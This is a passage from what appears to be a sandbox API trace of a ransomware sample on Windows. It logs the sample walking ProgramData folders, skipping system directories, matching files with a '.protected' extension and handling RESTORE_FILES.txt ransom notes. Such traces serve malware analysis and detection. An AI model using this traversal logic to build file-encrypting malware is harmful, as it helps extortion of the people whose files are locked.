(lpString1="MSDN", lpString2="Program Files (x86)") returned -1 [0093.181] lstrcmpiW (lpString1="MSDN", lpString2="$Recycle.bin") returned 1 [0093.181] lstrcmpiW (lpString1="MSDN", lpString2="System Volume Information") returned -1 [0093.181] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\MSDN") returned 37 [0093.181] lstrcmpW (lpString1="MSDN", lpString2=".") returned 1 [0093.181] lstrcmpW (lpString1="MSDN", lpString2="..") returned 1 [0093.181] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\MSDN\\*") returned 39 [0093.181] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\MSDN\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0x47b9d0 [0093.184] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.184] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.184] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.184] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.184] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.184] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\MSDN\\.") returned 39 [0093.184] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.184] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.184] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.184] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0093.184] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0093.184] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.184] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.184] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\MSDN\\..") returned 40 [0093.184] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.184] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.184] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.184] lstrcmpiW (lpString1="8.0", lpString2="Windows") returned -1 [0093.184] lstrcmpiW (lpString1="8.0", lpString2="Program Files") returned -1 [0093.185] lstrcmpiW (lpString1="8.0", lpString2="Program Files (x86)") returned -1 [0093.185] lstrcmpiW (lpString1="8.0", lpString2="$Recycle.bin") returned 1 [0093.185] lstrcmpiW (lpString1="8.0", lpString2="System Volume Information") returned -1 [0093.185] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\MSDN\\8.0") returned 41 [0093.185] lstrcmpW (lpString1="8.0", lpString2=".") returned 1 [0093.185] lstrcmpW (lpString1="8.0", lpString2="..") returned 1 [0093.185] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\MSDN\\8.0\\*") returned 43 [0093.185] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\MSDN\\8.0\\*", lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0x47ba10 [0093.185] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.185] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.185] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.185] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.185] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.185] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\MSDN\\8.0\\.") returned 43 [0093.185] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.185] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.186] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.186] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0093.186] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0093.186] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.186] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.186] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\MSDN\\8.0\\..") returned 44 [0093.186] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.186] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.186] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.186] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Windows") returned -1 [0093.186] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files") returned 1 [0093.186] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files (x86)") returned 1 [0093.186] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="$Recycle.bin") returned 1 [0093.186] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="System Volume Information") returned -1 [0093.186] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\MSDN\\8.0\\RESTORE_FILES.txt") returned 59 [0093.186] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.186] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.186] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0 [0093.186] FindClose (in: hFindFile=0x47ba10 | out: hFindFile=0x47ba10) returned 1 [0093.186] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\MSDN\\8.0\\RESTORE_FILES.txt") returned 59 [0093.186] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\MSDN\\8.0\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\microsoft\\msdn\\8.0\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.186] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.186] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Windows") returned -1 [0093.186] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files") returned 1 [0093.186] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files (x86)") returned 1 [0093.186] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="$Recycle.bin") returned 1 [0093.186] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="System Volume Information") returned -1 [0093.186] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\MSDN\\RESTORE_FILES.txt") returned 55 [0093.187] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.187] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.187] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0 [0093.187] FindClose (in: hFindFile=0x47b9d0 | out: hFindFile=0x47b9d0) returned 1 [0093.187] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\MSDN\\RESTORE_FILES.txt") returned 55 [0093.187] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\MSDN\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\microsoft\\msdn\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.188] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0093.188] lstrcmpiW (lpString1="NetFramework", lpString2="Windows") returned -1 [0093.188] lstrcmpiW (lpString1="NetFramework", lpString2="Program Files") returned -1 [0093.188] lstrcmpiW (lpString1="NetFramework", lpString2="Program Files (x86)") returned -1 [0093.188] lstrcmpiW (lpString1="NetFramework", lpString2="$Recycle.bin") returned 1 [0093.188] lstrcmpiW (lpString1="NetFramework", lpString2="System Volume Information") returned -1 [0093.188] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\NetFramework") returned 45 [0093.188] lstrcmpW (lpString1="NetFramework", lpString2=".") returned 1 [0093.188] lstrcmpW (lpString1="NetFramework", lpString2="..") returned 1 [0093.188] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\NetFramework\\*") returned 47 [0093.188] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\NetFramework\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0x47b9d0 [0093.188] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.188] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.188] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.188] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.188] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.189] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\NetFramework\\.") returned 47 [0093.189] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.189] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.189] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.189] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0093.189] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0093.189] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.189] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.189] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\NetFramework\\..") returned 48 [0093.189] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.189] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.189] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.189] lstrcmpiW (lpString1="BreadcrumbStore", lpString2="Windows") returned -1 [0093.189] lstrcmpiW (lpString1="BreadcrumbStore", lpString2="Program Files") returned -1 [0093.189] lstrcmpiW (lpString1="BreadcrumbStore", lpString2="Program Files (x86)") returned -1 [0093.189] lstrcmpiW (lpString1="BreadcrumbStore", lpString2="$Recycle.bin") returned 1 [0093.189] lstrcmpiW (lpString1="BreadcrumbStore", lpString2="System Volume Information") returned -1 [0093.189] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\NetFramework\\BreadcrumbStore") returned 61 [0093.189] lstrcmpW (lpString1="BreadcrumbStore", lpString2=".") returned 1 [0093.189] lstrcmpW (lpString1="BreadcrumbStore", lpString2="..") returned 1 [0093.189] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\NetFramework\\BreadcrumbStore\\*") returned 63 [0093.189] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\NetFramework\\BreadcrumbStore\\*", lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0x47ba10 [0093.190] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.190] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.190] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.190] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.190] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\NetFramework\\BreadcrumbStore\\.") returned 63 [0093.190] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.190] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.190] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\NetFramework\\BreadcrumbStore\\..") returned 64 [0093.190] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.190] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.190] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.190] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\NetFramework\\BreadcrumbStore\\RESTORE_FILES.txt") returned 79 [0093.190] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.190] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.190] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0 [0093.190] FindClose (in: hFindFile=0x47ba10 | out: hFindFile=0x47ba10) returned 1 [0093.190] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\NetFramework\\BreadcrumbStore\\RESTORE_FILES.txt") returned 79 [0093.190] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\NetFramework\\BreadcrumbStore\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\microsoft\\netframework\\breadcrumbstore\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.190] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.190] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Windows") returned -1 [0093.190] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files") returned 1 [0093.190] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files (x86)") returned 1 [0093.190] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="$Recycle.bin") returned 1 [0093.190] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="System Volume Information") returned -1 [0093.190] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\NetFramework\\RESTORE_FILES.txt") returned 63 [0093.190] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.190] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.190] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0 [0093.191] FindClose (in: hFindFile=0x47b9d0 | out: hFindFile=0x47b9d0) returned 1 [0093.191] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\NetFramework\\RESTORE_FILES.txt") returned 63 [0093.191] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\NetFramework\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\microsoft\\netframework\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.191] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0093.191] lstrcmpiW (lpString1="Network", lpString2="Windows") returned -1 [0093.191] lstrcmpiW (lpString1="Network", lpString2="Program Files") returned -1 [0093.191] lstrcmpiW (lpString1="Network", lpString2="Program Files (x86)") returned -1 [0093.191] lstrcmpiW (lpString1="Network", lpString2="$Recycle.bin") returned 1 [0093.191] lstrcmpiW (lpString1="Network", lpString2="System Volume Information") returned -1 [0093.191] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Network") returned 40 [0093.191] lstrcmpW (lpString1="Network", lpString2=".") returned 1 [0093.191] lstrcmpW (lpString1="Network", lpString2="..") returned 1 [0093.192] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Network\\*") returned 42 [0093.192] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Network\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0x47b9d0 [0093.192] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.192] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.192] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.192] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.192] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.192] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Network\\.") returned 42 [0093.192] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.192] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.192] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.192] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0093.192] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0093.192] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.192] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.192] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Network\\..") returned 43 [0093.192] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.192] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.192] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.192] lstrcmpiW (lpString1="Connections", lpString2="Windows") returned -1 [0093.192] lstrcmpiW (lpString1="Connections", lpString2="Program Files") returned -1 [0093.192] lstrcmpiW (lpString1="Connections", lpString2="Program Files (x86)") returned -1 [0093.192] lstrcmpiW (lpString1="Connections", lpString2="$Recycle.bin") returned 1 [0093.192] lstrcmpiW (lpString1="Connections", lpString2="System Volume Information") returned -1 [0093.192] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Network\\Connections") returned 52 [0093.192] lstrcmpW (lpString1="Connections", lpString2=".") returned 1 [0093.192] lstrcmpW (lpString1="Connections", lpString2="..") returned 1 [0093.193] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Network\\Connections\\*") returned 54 [0093.193] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Network\\Connections\\*", lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0x47ba10 [0093.193] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.193] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.193] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.193] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.193] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.193] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Network\\Connections\\.") returned 54 [0093.193] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.193] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.193] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.193] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0093.193] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0093.193] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.193] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.193] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Network\\Connections\\..") returned 55 [0093.193] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.193] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.193] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.193] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Windows") returned -1 [0093.193] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files") returned 1 [0093.194] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files (x86)") returned 1 [0093.194] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="$Recycle.bin") returned 1 [0093.194] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="System Volume Information") returned -1 [0093.194] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Network\\Connections\\RESTORE_FILES.txt") returned 70 [0093.194] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.194] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.194] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0 [0093.194] FindClose (in: hFindFile=0x47ba10 | out: hFindFile=0x47ba10) returned 1 [0093.194] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Network\\Connections\\RESTORE_FILES.txt") returned 70 [0093.194] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Network\\Connections\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\microsoft\\network\\connections\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.194] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.194] lstrcmpiW (lpString1="Downloader", lpString2="Windows") returned -1 [0093.194] lstrcmpiW (lpString1="Downloader", lpString2="Program Files") returned -1 [0093.194] lstrcmpiW (lpString1="Downloader", lpString2="Program Files (x86)") returned -1 [0093.194] lstrcmpiW (lpString1="Downloader", lpString2="$Recycle.bin") returned 1 [0093.194] lstrcmpiW (lpString1="Downloader", lpString2="System Volume Information") returned -1 [0093.194] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Network\\Downloader") returned 51 [0093.194] lstrcmpW (lpString1="Downloader", lpString2=".") returned 1 [0093.194] lstrcmpW (lpString1="Downloader", lpString2="..") returned 1 [0093.194] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Network\\Downloader\\*") returned 53 [0093.194] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Network\\Downloader\\*", lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0x47ba10 [0093.194] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.194] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.194] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.194] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.194] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.194] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Network\\Downloader\\.") returned 53 [0093.194] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.194] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.194] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.194] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0093.194] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0093.195] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.195] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.195] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Network\\Downloader\\..") returned 54 [0093.195] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.195] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.195] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.195] lstrcmpiW (lpString1="qmgr0.dat.protected", lpString2="Windows") returned -1 [0093.195] lstrcmpiW (lpString1="qmgr0.dat.protected", lpString2="Program Files") returned 1 [0093.195] lstrcmpiW (lpString1="qmgr0.dat.protected", lpString2="Program Files (x86)") returned 1 [0093.195] lstrcmpiW (lpString1="qmgr0.dat.protected", lpString2="$Recycle.bin") returned 1 [0093.195] lstrcmpiW (lpString1="qmgr0.dat.protected", lpString2="System Volume Information") returned -1 [0093.195] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Network\\Downloader\\qmgr0.dat.protected") returned 71 [0093.195] StrStrIW (lpFirst="qmgr0.dat.protected", lpSrch=".protected") returned=".protected" [0093.195] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.195] lstrcmpiW (lpString1="qmgr1.dat.protected", lpString2="Windows") returned -1 [0093.195] lstrcmpiW (lpString1="qmgr1.dat.protected", lpString2="Program Files") returned 1 [0093.195] lstrcmpiW (lpString1="qmgr1.dat.protected", lpString2="Program Files (x86)") returned 1 [0093.195] lstrcmpiW (lpString1="qmgr1.dat.protected", lpString2="$Recycle.bin") returned 1 [0093.195] lstrcmpiW (lpString1="qmgr1.dat.protected", lpString2="System Volume Information") returned -1 [0093.195] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Network\\Downloader\\qmgr1.dat.protected") returned 71 [0093.195] StrStrIW (lpFirst="qmgr1.dat.protected", 